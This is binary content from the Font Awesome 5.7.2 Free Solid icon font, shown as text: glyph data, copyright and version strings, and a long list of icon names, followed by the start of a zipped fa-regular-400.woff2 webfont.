>``� K7H6		�	 	 !`A]]A&m/$(�?/S!('1�32+5##5##5##5##"&=46;546;546;232�		P @ @ @ P		0	0	�	0		�	��������	�	0	0		0	0����7>Eeoy7#"&546;'&?6'&6?67>763253#"&53#2#5+#546;&54632632#3&#"7654&#"36�
	�


			  
		)��
�

��
( 7!!7 (�5	�	5��
`
	


	66

��`��`
 
`��`
,KK,
0		0������9=A%'&6?'#"&/#"'/&7>7.?>76767'7'�
'(??('
�'%WrrW%'��_$�p$_C	h.'KK'.h	C	fW(�
00
�(Wf	G'@..@'�����2#!".'&63!!�8��8���9���e@�����cs�2"&44&#"+;2=732;2?6;2;2=4?6=46;2+";2;6$;2?6=4&">7#"/&+'&+";2�Α�Α�uS(	

	% 

		 ��
	}5W
	
+ +	��Α��gSu	

	
		
			!�
	��8-
%

` %2#!"&=463%2#!"&=463�		� 		�		� 		�	 		 	�	 		 	 ����+"&546;2+"&546;2`	 		 	�	 		 	0		�		� 		�		�����)1"'.767>767>7&4?62264&"�		D
	7#mT#&K"6		D		��((�		D		6"K&#Tm#6

D		��((�����"/&6?>'7'6�$!��!$"b&`�0`"&a"v%i(��(i%#W@��@h#������@j"&4622462"&"&462&54'&>367>'&'&636762'&'.7676&'"'6'&5<546�((@(((((@	72		94�	27	
	49	((((`((�=3


:2
	�
1:
+3	

���/7%+"/#"&'.+"&=4>?6264&"�.	
3
./	7")�
%B0�
0%zt(	
@
 &R
Q?bU;K
6!8�����"'"/"/"'&63!2�WB.".,$W���,l����}��@�'08!>32#47%#534'3+#."#553#"&62#54@��'~J�`Bp?��B��
� 2:F:2���
�P8��~;E��C=�_��=C@`
 �##��``�8(``(������%2#!"&=463$!'&>76p		��		e(H��0@te
 	@		@	�"5W�:e@:����(:B&'&'&6;2+"7&'&'4>;2+"2++"&=463264&+#

n#
�.BB.8(�(8
p.#1,#1, B\B(88(�
�(`������$47'.'4>37'&6762&"2"&42&/65�&Q,6�Q7|7Q-((6,Q&�,� `8D�

� ((8` �,����%-5=7'&'&637&"'&67622&/65&2"&4264&"62"&4�*4
�$*"H"C
4*�Α�Α��ll�l��#C*B
6

C

y
B*C#��Α���l�ll�l ����)9V"&462"&462++"&=#"&?6727%2+"&5463++"&=#"&=4672�4&&4&Z4&&4&?7
0
7.8��		 		|

P

8@&4&&4&&4&&4��h

h��	� 		�	��
�

�
������7;?%"//"&46327'&67>7'&4?62762%7'7'�		a		P
k
l'Z(
Q		a		P0

/

0��EIE�IEI�		a		Q
(Z'l
k	Q		a		Q0

/

09EIE��IEI�����-B7.7>7&5462#"'+"&5.'.=46+"&5.'".=46�t9�b u
z�	 	�a	
Sv	 	S9
fta�9u
>�z
	a�	 	`vS
:R 
����
2#!"&575#35#35#@&&�&� 0�0�0�&��&&@��``````����
#*.52#!"&573535#"5#;5#75#326=!%54&+@&&�&� @�@ 
@@
�@�@ 
�
 �&��&&@��@@  @�@ 
@@  @M@@` 
@������(2O2"&42+"&46;264!6"/&627"&4?"&46;2"1"&='&6?|(()	`		`	��'DD
=\		0

�R=N�((�\				DD�	\	
�1S=Y

SN8�����$C"&462#"'%.>7'&776'&76776/&//'�((%�x			�.Kk(

1���#>R04	: s/`((���fEK5(#JFa 3		
9��@�.BN"&4622#!"&46;0&5&6?63232647'.?'&3737#"/d((�*� 

+6
(%,G*,
F
�U
%
'4>+�!
 =`((��
*
(5
�"Q2
.W
���

[�)N$	L����C%#!"&=463!2654/&?6%5"&46;2;26=32###5##5.e,��			



��

&"	/= &`

8(@�@*6a&'		


w�	,&@`(80004E�����6Wy2#"'#"&'&>7&542654/&54;2=4+"+"3754&+"'&+";2=2?;232654/&54;2=4+"+"3�Ԗ�j83AL9��	

	
0�z�z319JV�h		##		hD88D�����EQ"&462'76#"'%&'&>&'&6?54?'&/&>#"'&7�((TB4Z		��!&
J#*		?o
�<U�`((�?'f"�!			
5(:4S

--=

�����T\dlt�+"'.547&507'.?>54>;2167&5462704=46;276$264&"264&"6264&"6264&"7654&"6264&"��!	#%c
!&,�	8	
8P8
	8		
��			)																(7
"-.QC(?,
7	.!(88(".		*			��			7			7			O			2			����[`l62"&462"&462"&462"&4"/&=##!"&54>7546;546;2354?623'264&#!"3n^^^$
%)+B.�.B� O@)%
$��@zD:�H#%
$*:.BB.(	[p�
3:*$
% f S`@���((����2++"=#"=43%2#!"=43t�8�h�� 8��8�88����%19#+"&?.5475#"&=463!2;2=4+"264&"p /(�(/ 		`		��006tRRtR��2TGGT2�				������/9A%"/.7'#'76'"'&7>76'&"&4?264&"�5
uk>`@�k04
R*I%JDK
	�|5%�u45u0k�@`>k6R=+	KDJ$JR {%5�������)-15="&462232#!"&=46;5"#"'&67%65#%35+3"&462-��

��

�����``�``c�
<\
�

�
S;���`````` ����"&54676>'&'&'32D4H���_I9*
$:\K8+�0�+_��_6�D5: ��Y'	Cu ((8E����A�,X7'&67670767>767632%"#"/67>7>7>767�

5#$	
$7E #3

	%.&%
L	
$7E %C(

	%.
	 !5#p
!#
J$'

	%
%&!�
J6'/

	%&!!	!����2:%#!"&5463!2;;2=32=4+54+"#"5!"3�

��)77)F��808808��
Z	4
	7)@)7�088088��@��@�2##!"&5".546 AoH(#��	��2;�

	>k���	5!#!"&5!%630
�@
,Y{���

��Z�����A�,H3#!"&=26554+54+"#";;2=327#"/&"#"/&547%62 �	�`	;808808���M��		�D088088����

���02#"'#"547>7&5454+54+"#";;2=32�Ԗ�j83AL9`808808�z�z31:IVn088088�����%."/&4?627"/&4?6?7'76�
�7-nxf
fn-7
D
P	�
�7-nf
fxn-7{
D
	P����2"&546�b]2p�p2�u�7PppP7����'/7?%2#!"&4632#!"&=4637"&7>2#&"264&"264"264��`�	&��&	~�~>			�			�			�((�	&&	�42BB24p			)						 ����@%+"&/&=46?2=4>3762=463212=46�4�/
	


'$�S4J	L� �� 2	�#%!5467546;272#!"&=463�@B5)	`	)5B		� 		�@@;aRp		pRa�	 		 	�����AKU#"&5467>264&"2767>7>7>7>76'.?6&/�		��
"!/
`
!!(	
 ' ' 	
 ' ' �|�3��3�!
��
/!"
`	i
' ' 
' ' �3��3� ����2#!"&46;&5462'!"&p��TxT�cc ((<TT<��������%)A7"=4;54;232++"=%!463!2!2#!"&=46;;267�80880 ��@���	&�&	�
=�088088���P���`	&&	�#32#!"&54635#"3754&+326754&#!"3!26�&&��&&`P		�	PP	�
��

@
�&�&&&��0			0	�@

@
���1%3#"&4632>77'#5'6326'&54?632Kk%Kj�L!!1$5�6YK$(
�'"G@)!.!#+2-,&B9N"+
$7���&.6.'7>#"&5476264&"6264&"264&"�Z�b9R�]
3X�K��
rC{�	_�Y]�P9qJ�Vi
L�{����	7!+"&7;;26=326/&"72#!"&=46;76;25��E9	 	9Z�		�`		x	r	S���p		p^�	 		 	

����	7!#!"&7;;26=326/&"72#!"&=46;76;2 ���[9	 	9Z�		�`		x	r	P���p		p^�	 		 	

����7?N7"&547676=7+"'7;;2=32=4+54+"#"26=#!"&5467:	
��
R%^%,(/B/6K"��"K6_�	<$)1001)$<  �] !//! �N6""6N_V6���E%��
,p�
-g��	4	2Q	
�	>�	2	J_	,�	
X	.�	&�	
!	23	&�	
�Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Free SolidFont Awesome 5 Free SolidSolidSolidFont Awesome 5 Free Solid-5.7.2Font Awesome 5 Free Solid-5.7.2Font Awesome 5 Free SolidFont Awesome 5 Free Solid329.474 (Font Awesome version: 5.7.2)329.474 (Font Awesome version: 5.7.2)FontAwesome5Free-SolidFontAwesome5Free-SolidThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 FreeFont Awesome 5 FreeSolidSolidFont Awesome 5 Free SolidFont Awesome 5 Free SolidFont Awesome 5 FreeFont Awesome 5 FreeSolidSolid���	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTU�
VWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�����������������������������������������������������������������������������������"���������������������������������������������	

 !"#$%&'()�*+,-./0123456�#789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs��tuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@�ABCDEFGHIJ�KLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<�=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~���������������������������
glass-martinimusicsearchheartstaruserfilmth-largethth-listchecktimessearch-plussearch-minus	power-offsignalcoghomeclockroaddownloadinboxredosynclist-altlockflag
headphones
volume-offvolume-down	volume-upqrcodebarcodetagtagsbookbookmarkprintcamerafontbolditalictext-height
text-width
align-leftalign-centeralign-right
align-justifylistoutdentindentvideoimage
map-markeradjusttintedit
step-backward
fast-backwardbackwardplaypausestopforwardfast-forwardstep-forwardejectchevron-left
chevron-rightplus-circleminus-circletimes-circlecheck-circlequestion-circleinfo-circle
crosshairsban
arrow-leftarrow-rightarrow-up
arrow-downshareexpandcompressexclamation-circlegiftleaffireeye	eye-slashexclamation-triangleplanecalendar-altrandomcommentmagnet
chevron-upchevron-downretweet
shopping-cartfolderfolder-open	chart-barcamera-retrokeycogscomments	star-half	thumbtacktrophyuploadlemonphonephone-squareunlockcredit-cardrsshddbullhorncertificatehand-point-righthand-point-left
hand-point-uphand-point-downarrow-circle-leftarrow-circle-rightarrow-circle-uparrow-circle-downglobewrenchtasksfilter	briefcase
arrows-altuserslinkcloudflaskcutcopy	paperclipsavesquarebarslist-ullist-ol
strikethrough	underlinetablemagictruck
money-bill
caret-downcaret-up
caret-leftcaret-rightcolumnssort	sort-downsort-upenvelopeundogavelboltsitemapumbrellapaste	lightbulbuser-mdstethoscopesuitcasebellcoffeehospital	ambulancemedkitfighter-jetbeerh-squareplus-squareangle-double-leftangle-double-rightangle-double-upangle-double-down
angle-leftangle-rightangle-up
angle-downdesktoplaptoptabletmobile
quote-leftquote-rightspinnercirclesmilefrownmehgamepadkeyboardflag-checkeredterminalcode	reply-alllocation-arrowcropcode-branchunlinkinfoexclamationsuperscript	subscripteraserpuzzle-piece
microphonemicrophone-slashcalendarfire-extinguisherrocketchevron-circle-leftchevron-circle-rightchevron-circle-upchevron-circle-downanchor
unlock-altbullseye
ellipsis-h
ellipsis-v
rss-squareplay-circleminus-squarecheck-square
pen-squareshare-squarecompasscaret-square-downcaret-square-upcaret-square-right	euro-sign
pound-signdollar-sign
rupee-signyen-sign
ruble-signwon-signfilefile-altsort-alpha-down
sort-alpha-upsort-amount-downsort-amount-upsort-numeric-downsort-numeric-up	thumbs-upthumbs-downfemalemalesunmoonarchivebugcaret-square-left
dot-circle
wheelchair	lira-sign
space-shuttleenvelope-square
universitygraduation-caplanguagefaxbuildingchildpawcubecubesrecyclecartaxitreedatabasefile-pdf	file-word
file-excelfile-powerpoint
file-imagefile-archive
file-audio
file-video	file-code	life-ringcircle-notchpaper-planehistoryheading	sliders-h	share-altshare-alt-squarebombfutboltty
binocularsplug	newspaperwifi
calculator
bell-slashtrasheye-dropperpaint-brush
birthday-cake
chart-area	chart-pie
chart-line
toggle-off	toggle-onbicyclebusclosed-captioningshekel-sign	cart-pluscart-arrow-downshipuser-secret
motorcyclestreet-view	heartbeatvenusmarsmercurytransgendertransgender-altvenus-doublemars-double
venus-marsmars-stroke
mars-stroke-v
mars-stroke-hneuter
genderlessserver	user-plus
user-timesbedtrainsubwaybattery-fullbattery-three-quartersbattery-halfbattery-quarter
battery-empty
mouse-pointeri-cursorobject-groupobject-ungroupsticky-noteclone
balance-scalehourglass-starthourglass-half
hourglass-end	hourglass	hand-rock
hand-paper
hand-scissorshand-lizard
hand-spockhand-pointer
hand-peacetv
calendar-pluscalendar-minuscalendar-timescalendar-checkindustrymap-pin	map-signsmapcomment-altpause-circlestop-circleshopping-bagshopping-baskethashtaguniversal-accessblindaudio-descriptionphone-volumebrailleassistive-listening-systems#american-sign-language-interpretingdeaf
sign-language
low-vision	handshake
envelope-openaddress-bookaddress-carduser-circleid-badgeid-cardthermometer-fullthermometer-three-quartersthermometer-halfthermometer-quarterthermometer-emptyshowerbathpodcastwindow-maximizewindow-minimizewindow-restore	microchip	snowflake
utensil-spoonutensilsundo-alt	trash-altsync-alt	stopwatchsign-out-altsign-in-altredo-altpooimages
pencil-altpenpen-altlong-arrow-alt-downlong-arrow-alt-leftlong-arrow-alt-rightlong-arrow-alt-upexpand-arrows-alt	clipboardarrows-alt-harrows-alt-varrow-alt-circle-downarrow-alt-circle-leftarrow-alt-circle-rightarrow-alt-circle-upexternal-link-altexternal-link-square-altexchange-altcloud-download-altcloud-upload-altgemlevel-down-altlevel-up-alt	lock-openmap-marker-altmicrophone-alt
mobile-altmoney-bill-altphone-slashportraitreply
shield-alt
tablet-alttachometer-alt
ticket-altuser-altwindow-close
baseball-ballbasketball-ballbowling-ballchesschess-bishopchess-board
chess-kingchess-knight
chess-pawnchess-queen
chess-rookdumbbell
football-ball	golf-ballhockey-puck	quidditchsquare-fulltable-tennisvolleyball-ball	allergiesband-aidboxboxesbriefcase-medicalburncapsulesclipboard-checkclipboard-list	diagnosesdnadolly
dolly-flatbedfile-medicalfile-medical-alt	first-aidhospital-althospital-symbolid-card-alt
notes-medicalpalletpillsprescription-bottleprescription-bottle-alt
procedures
shipping-fastsmokingsyringetabletsthermometervialvials	warehouseweightx-raybox-opencomment-dots
comment-slashcouchdonatedovehand-holdinghand-holding-hearthand-holding-usdhands
hands-helping
parachute-boxpeople-carry
piggy-bankribbonrouteseedlingsign
smile-winktape
truck-loadingtruck-movingvideo-slash
wine-glassuser-alt-slashuser-astronaut
user-check
user-clockuser-cog	user-edituser-friends
user-graduate	user-lock
user-minus
user-ninjauser-shield
user-slashuser-taguser-tie	users-cogblender	book-openbroadcast-towerbroom
chalkboardchalkboard-teacherchurchcoinscompact-disccrowcrowndice	dice-five	dice-fourdice-onedice-six
dice-threedice-twodoor-closed	door-openequalsfeatherfroggas-pumpglassesgreater-thangreater-than-equal
helicopter	kiwi-bird	less-thanless-than-equalmemorymicrophone-alt-slashmoney-bill-wavemoney-bill-wave-altmoney-checkmoney-check-alt	not-equalpaletteparking
percentageproject-diagramreceiptrobotrulerruler-combinedruler-horizontalruler-verticalschoolscrewdrivershoe-printsskullsmoking-banstore	store-altstreamstroopwafeltoolboxtshirtwalkingwalletangryarchwayatlasaward	backspacebezier-curvebongbrushbus-altcannabischeck-doublecocktailconcierge-bellcookiecookie-bitecrop-altdigital-tachographdizzydrafting-compassdrum
drum-steelpanfeather-alt
file-contract
file-downloadfile-exportfile-importfile-invoicefile-invoice-dollarfile-prescriptionfile-signaturefile-uploadfill	fill-dripfingerprintfishflushed
frown-openglass-martini-altglobe-africaglobe-americas
globe-asiagrimacegringrin-alt	grin-beamgrin-beam-sweatgrin-heartsgrin-squintgrin-squint-tears
grin-stars
grin-tearsgrin-tonguegrin-tongue-squintgrin-tongue-wink	grin-winkgrip-horizontal
grip-verticalheadphones-altheadsethighlighterhot-tubhoteljointkiss	kiss-beamkiss-wink-heartlaugh
laugh-beamlaugh-squint
laugh-winkluggage-cart
map-markedmap-marked-altmarkermedal	meh-blankmeh-rolling-eyesmonument
mortar-pestlepaint-rollerpassport	pen-fancypen-nibpencil-ruler
plane-arrivalplane-departureprescriptionsad-crysad-tearshuttle-van	signature
smile-beamsolar-panelspasplotch	spray-canstamp
star-half-altsuitcase-rollingsurprise
swatchbookswimmer
swimming-pool
tint-slashtiredtoothumbrella-beach
vector-squareweight-hangingwine-glass-alt
air-freshener	apple-altatombonebook-readerbraincar-altcar-battery	car-crashcar-sidecharging-station
directionsdraw-polygonlaptop-codelayer-group
microscopeoil-canpoopshapesstar-of-lifeteeth
teeth-open
theater-masks
traffic-light
truck-monstertruck-pickupadankhbible
business-timecitycomment-dollarcomments-dollarcrossdharmachakraenvelope-open-textfolder-minusfolder-plus
funnel-dollargopuramhamsahaykaljedijournal-whillskaabakhandalandmark	mail-bulkmenorahmosqueompastafarianismpeaceplace-of-worshippollpoll-hpray
praying-handsquran
search-dollarsearch-locationsockssquare-root-altstar-and-crescent
star-of-david	synagoguetorah
torii-gateviharavolume-muteyin-yang
blender-phone	book-dead
campgroundcatchair
cloud-moon	cloud-sundice-d20dice-d6dogdragondrumstick-bitedungeonfile-csvfist-raisedghosthammerhanukiah
hat-wizardhikinghippohorsehouse-damagehryvniamaskmountain
network-wiredotterrunningscrollskull-crossbonesspidertoilet-papertractoruser-injuredvr-cardboardwindwine-bottlecloud-meatballcloud-moon-rain
cloud-raincloud-showers-heavycloud-sun-raindemocratflag-usameteorperson-booth	poo-stormrainbow
republicansmogtemperature-hightemperature-lowvote-yeawaterbaby
baby-carriage	biohazardblogcalendar-day
calendar-week
candy-canecarrot
cash-registercompress-arrows-altdumpster
dumpster-fireethernetgiftsglass-cheers
glass-whiskeyglobe-europe
grip-linesgrip-lines-verticalguitarheart-brokenholly-berry
horse-headiciclesigloomittenmug-hot	radiation
radiation-altrestroom	satellitesatellite-dishsd-cardsim-cardskatingskiing
skiing-nordicsleighsmssnowboardingsnowmansnowplowtengetoilettoolstramfire-altbaconbook-medicalbread-slicecheeseclinic-medicalcomment-medicalcrutchegg	hamburgerhand-middle-fingerhard-hathotdog	ice-creamlaptop-medicalpager
pepper-hotpizza-slice
trash-restoretrash-restore-alt
user-nurse����`)l؈��؈��PK!�r�555)fontawesome/webfonts/fa-regular-400.woff2nu&1i�wOF25
�,4�IyX?FFTM`�Z
��D��Q6$�T�6 �U�+k5㘥x�3�(Jiv��?PC��]�@�KT�7�eU֬i�6�Ҧ#p.5]���8�C`ݍ�e
�[��ǽ�c�HR$�dط��¡@��n��X�}��P�1^Nw��NۧؿnI8ǐ��D��C��	O}���h��9X٫B��y�A�n��<���V\�-�Dq�\`Zi��Y9*�Ʃ-3��~Ӻ֕�v�ֶ��}u��5���<%�+.���'\!��*��Arߎr‰`���:%�>�/��6')�D8����3�	������TR�c8f`>�˩��6��NR�`LJ����\�����W�j�d[-ۖmJ	;.��#\�k��{���3������.�KW2�-ݥ�X@�҆gYӖ�Z�1??��Qr�%��hot�_�U3b�^*S�1��^�E���$��%���-ˌ��qa�z�03�0aCN{��D�
9��R*�}�^�\Ѧ���9S$�=�BWeG{������*"
�g�?d[�^�=AA��f�v�,�~�ɛ᎞�{�Aj�$PP�DD��@ �f,!�������Q�/@	9n'�,w��˝^Į�;��.��lf�A���2(��J�}���$��,�C^0! ؔ�"�iMGrY@
��c	-���>��nγ��\���ן��Yܒ6��	L7��mw�_x�-��{��xɥ�_a����
7�X_u������n��[/����<�o��sGwbg���@��8��M�_wТ��4�o�+�8���D�e��5nxl��m?���ظ�mڎ}Y��O)��7O�]<�ͻ����?[�d�;/7v���qf��/x�3����/.r�c\l��Z5�J��y��9��ٓeY��Y����q�4o%)�����s�L?.��w�ڞ�c�ww����E´V�D��x�a���d��&
�=T�5����vDc�%�Ci��<�b�88o�8�� !Ǒ�0�T�%���q���ع$Ə�P�Wr�]���2<�9bxM��Ŝq9RDb��|b�
�6�n'ָmK
��9a��&��x��tx/�(b�[�b��F��/q?4q�D�R�ݞ>h�����X�ګP�<�-�{�<�u ��ʂ����`�QT���+��뷵xE�q��
�`u��}Nc_�B��Z��RA�~���7io�����i~H��N�@��E5�:���y�@�
_�S�b��k9,��_��~�N����?�WP��sW-M�4p��c�cnώ?�+O%_ЦBz���J:!�����f��`�$��#��0��ؽ�,AӅL�6����d}b+Ɗ�kjFѮ��.!�+:%c�ÈP��$"��&$������#�{A�2I���hL�7b9�¼�\�j��n��������7�c����o�gì4��Qk�K��������2� f�F��
�А`ݣL�׈w�#�$���Fv쾴_�7�8L��MhY���	0��g%�*N� �Oi��0"g�l`�
��v��jJ���;�1F�F�?E�7A��걁)�X�	�3�5�	��j��7`���k�_�U_Wn/�F�`��D����5���@>��e)���-�8fdp�P�G����G�ViԎ�}��~��>R=z�����<8�
��i0��a7k5`���.oq
�S�w�zj&��9VB�C�VBMi��'�4!��B�H}Ɓ)
3E�Z���K�<��Z�7�ɸR�������m|��-Y��Z�\E�S��I�A�a�c�
���la�N,(yĭL� ~�Rե7��4WI`�r��eƭP�	!��I�Ԏ���^M�l| �0�4�n
�-���h�J�6H )�.dd2�|�W`�y����x����S�`��\I�"����Ա2�B!�����.n_R�x���e�����w�4��:S���—�ݻ7���K}�˗�7Ƀ㓺oz����wC��^�x!U����8}�b��\�t9�0�F�����/'��7�^9yW	0Ҽ,h��N�T3I�bBi:��~��z�Xԟ�%��kzo�W����I9�?�AXuߛ��r���SL@��c�\V��4�OO��;���y-t��lN!��!^`�*#*/���Ʃ!74����	m-m����tVe�%9�X���*"�'#�M�"��m%M��:Y��v�h:�����*Ĥ-�����3��^����=�K�a�h(bB�$w7���&��KMI�:pC�u�Gvh^~��)kiͭ�~R�~�^T^�L��$ްfq�[?H�	���*�����L�;A�|iG���B�$���	�V5P§�hЬqÔ���E_�/��ND��6�yڐ^���4m�-^��e�?��>��Jչ��hk�A�m�8����'`$[Y^u�J1H#`[ؕr���� �CQ`+n��A|mk�mN���n*D�t)H2��!-+�Ϣ����S������|�<��̂`�����x�Hk�@١��6C��\
�^�rן�"ç�ng��N�~xى��e�;3ۀ��3/��&���$����_U��yE��n�����}�~m�t+/+����<���~$����S8����������>�a�{Ͱ�����ځۊ���_�MjB�C�l쒡a�b�S�M�L4�7����chߦ����b��I�p�X�7^c������f�k49�3��7�CQj�+[�J��~�k�D��8���S���Pe�5<ED!�<�&g�66�[����2bD�3-p��!��T4�Z����qj~3�p6u6_~��"�3h�	�nK0���cXp����9u�J��EU4�*l��D�h�>ے��B�`/��ה��4q[x���,i-��ʱ��������sڡR��!JX�[*���I�kp���fEaYkK���6U(v���[� cn_*쳕���<b�rb�h8b�u��9{A'�����I7o�vO��υ��ɮ+Y��F	��w����(�3G��*�{Νw�g�/�j斕.�v�33O?�έg��{�������y`��ӛĵ+�t�Y��{Ɣ�4���:,�cj�.�|�#�K�˄a0�!����6\���#)Wn�L����r�z�^*+�U�uF��̾e�1N��kX�ӲK'w�<�� N�����j����2����&�h���B�C�2,�ޔ>�fڦ	���텃A�ф�-;��޻Ų�kڱi=!�>�ڱ�l�i�ʚV��f8�Ey�d�N�,�ڡ�����;5M�{�/��ء昳����֌��蓽ư��J��ԉr�`@��hC��r��S&a�%KQh�@��8!��/2�>�l�al%�����p���ax�ݲ6\�j>ڿjz�
�{+�W%%����ߎFi���hŽI0�\

��qEaKH`yՓx��Ь�S��wn~'n~]���I]r��ENL��7��
s�1ĝX9��Wk#
)�-���Z�`���_C$Q�g<�h`�H�L	�����4
�/j��+���C�zzǥ��X�>����G�%}�RYq��-]
��A	|�o�'�4�8Sx�e��k���x���Q"�C	:_���\/��4�Yq�O	�v;\3�(�f���?�6	m(.����2��!��4�͚���O����3!5�MkHI��Z�i�Z0[��#��w
�5K�Y�˹�"n��X����kk��H0f�&������}ȝw���׮?ɘw���{8m0�c�DB�f	V��j����\�-W��>`�~� ��ִ��	[1�V+NB�K�Z\�Z�լq��P����#�K���U����r�t�I�Y����{T@"č��N��-^\�����R���1�����Di�Y^����[�K;�ɂ?~J����+А&1L��N5%+Lt&���1����(+�kS�S\��Ӫ��i��
�4�d��1�������l
?D!DyZ��U��[1�M�MQI�f�d��mU��FF!�t56��!~$�Կ�On���G��$�n�
�G1�����̼G":�Y��=�����+����
�!��y7�M����T���~\��s>^Yj�Ҽ��ڗ6#��}���O�}k����u�P g�����E�+���(}n�ޙ�\�H_*{ji��x]�N��rۢ��X}����ŕ�
�9=$)#	�O��T�*�ޤ���܆��L����Ż|�c]�t��8}L#�f3�z�i>v����%�?ِ#�����ǵ��ucy������;X�t��ɹ쀄a�~o���͎��\	�5A�Q���ӻC���$l*.(���ʿn	g�"4�׎~-�>i�p����`?�/[�k�N��/N�R5�e\�&�O�)�ڥ�q��i��WG�e�|l=*�gW���]k>�
f��2�~V�|Xl�����>m4��X���ru���3r��c]���J�h�|�O>�~�6��6N�ŽS7*Q�=��ք��NX'�Pq�����������ֹ0�!&��+`Q�:@�~�+5�$��D��~�\�a�oQ��ܣc\
��]�	�_�V��R*
��K��"����W�K�yX�9�h��-�ղ�6�8����MÞN�C���,cE`+��=�a�.Q�2�3� ���<�C��U���2��T�J��P{�.ƹT�\�?�\���‘T-H�m%�R�د}_e��a�8��Ҭ�p�ui��I;���b��*R�g]��wwX��i�ſ�q�$�����!2@o~�y
�|=g�<��_6ɕ3!��^!�q��$L�q��$U+KΘ��c0�/�zUJ)K�����[�[uS)F^ҺW����D��ز�#��cO�Z�fr�j8�r�1"�v�^�{}aU�nY��K_U��\
�	"6���Ck8'V���G�7�=&�jw
�%h��a#g$ދ�;��Z:N�'X{˩�#sa��E�q��7�u�Eb1�'�vl��+��{g�]��w5��W���UotWI��—a����0rZ�b��c�p�e�L}������:�3nϹZ��#�����6��jD�����IB���	%��0*

���o��w��5Ea�����v+2O��UD{��qI�<�c6��?�O0�̠^t��[*;;M�l�$U��ᙲ�f�9���GLvۥ���8��4B�Ȝ�d���<�T��0ӆ�A�m(�p1D��#�3$��O�v2:Ь�q�I�Xo����Z=_�[$V7ΪS���#`��5�#[�� �/�qR[�M��~d�	3�Pm�`�ʆ�"�c_r$7 �U�5�4a�4�����l�,�Jm�k���Ȱ[�I?�7x�=
!�@ʜ���p�2&hkF�:Ȩ���o�2�zK�g�Tܶ���!�U�D��	X�N�b9ɴ&�
����i�7�o��	���M��F����B�zH?����닂��׳U�q'E����T���
Culr���#�
n�{#�wQ��<����-o��f���xc��A�g�V5Ō��̮���.s�iwx��"I��.�EbL������`��|�9�Mn;�|�Fw�F��r�
��l=�A6�g�����s��A�כ����A6�]��s����������2]���;�:^�>�'z��ϊ��y ��i����K���
kAНUm���g���gN��H�E��c̛�Վoj]���A�)M}��h�՞& �h����]�=:�t���mzS
&�=-��ot�L��s?���WA0�c�sAPR��"E���Ӂ���>8:7:�{r���pw,kGzC@��({�IOǾ!OC^�ļl�׮q{���ɶ}e�A�'w,Y��t��j�!]"8����h{n�.�nT�C�B����:��
���ބ��A�^{~ԂPk��@�0��tհ,U;��7��MS�.O4�@��_�j��(صې0����ނ��y_����ך�p�+�z��^{�јX?(C�C��xY��YuD����}b��K�y�5-^7%sL1?���]���w76��zV*&ua��-�eʼn	YSw���f�͌U7j�}�(G>0�c�@���$�c����q�k�ߡw��n���ʃs�����XŁ������R��56���#�<�}�BjV�خAMޯ����$�t�t�bB�='c����1J��}�C���X��=z4"��0K��6ಜ���Ju�oLQL�,m�Y.~����?K�"@h�<.#����SҲ�K~�s"���o���k��=�zf�Nn���y>���
�Oꥋ�c��V�����#�|��bE{�?�:5�{��p�ԁ�6[|59-r��AR�y����@0�E��ر�Ћ���R�$��.i�h����ﬦt�����bSN�L���pӪ�_�oy�2���r*��8��"@D��xJ��rUQP��G�H�t�t$�5"0����Z-�H5�_�p�u�8��AB���Pl��۴?��j}�g��pײ���?;��;	x
|�,."���ahע�Ę��h7�ZEBf��GE�ry��L��.����I����g����bC��}� t����g/�}�,�*�bIod���4`��LK�L��K0��{Ԁ������|)���Vg��6Z���5GGbHS8�����8w�����d�i�V�e0i�?P�P�b�1B`��C$5gO���?�.���0EF�����'��r��>k��K'�s�iR�]��Ϝ\t���C
 �As��$!��k�GSq�M9%�óA�v�
�9�&l1�4R@��������4R�#�ʋIj[NH&�]�Y�#䎘�!ɨ4���R��~X�U�Q�>!��yGC�é+m��w=ZA��
VC��Z��{P�\�
��]	�t|�Kl�Hv8�c?�PB�P���F�V�����ʂ�FIT���IJ
`�ډ�����e0�	�?@����D�b��+"�$�bB���Bp�h
���苔���+��4ob̩k��.25E���&�)��لBȑu!�q��rO�ML��鐠]_c�q�pt#
.w�Nz�l���3e1�V`[o��I�-�D�P��PyE	�����&/?[�=#��Y��U٠#ۖ����[֒�(�Weo�ܚG_��&�h�z��P����(��Bz�N�ӆo�j��f����6)�<$TwE@W3��dgP��o�hǰ���?���$/V�t�Q�;T�j���Ы�~Sj���΁�~�p=��<V�N�&��{�����C
���Y7u�uE��.�ti?�
�Oǻsdܘ�嚦_�}����۾�<������F�
1Y5Y�:�Ώ�2��9��ȇ�i����k�"KI����Rdhn�؟cw��Ml�6���K�^t�If*[+}�9�0%%u�(T0�8/��� {�?{B4����1����<�<+5c4���ۡ�8W��b���iA$��$"}r^�����#7xab-�]�i�bq
i��;29�ZA�� b:�nR��˿�&G}�I�:|�pO�e����=�I;[+������C:��;	���{̨%��L����=x�;h/���g��̓��z�{*��MK^4�ĸD~x�� %h>|�'��N�nZ�I-)�D(?il(��\X��IU���h�Y�z��3Դ��o䷬k��9Ѕ]�q�]݇JN�>�#�e�$�n|��$G9U�Y����[����Κ)��Y��̽"�"��~0.'�k�ˑ�@K�}V����5Ɔ��-���?A�$������n���7쟔ޭ4��Lz�_���go˔�Di}��,�D�����i_���T4��T���796^wOL͹�	*���n�s��������8���4�h_�
�B��b�D��h�1�U�9UiC�ai�*h$��%KO���ai��h[W�{����=�'�FT�|��	��K��U�(�o��9��պ3�h9�Q6f���(E7�xʱ��ߚ�O�=��FIPMޞ�,ŵ��׉t{��,B�J�����~
D�>v��H]fܕ�~�;�����²�ѷ�nD��u��ž�� �#�z)<W8�J��%�,���,/_�8�1�jE��l[9�w۟����1N�Qa���f9�eG��H�}�qLf���F�dݨ�C~Z��|���#�Sg�Z�!�U�
�\�7k�B�謭�Ť�G�
~�
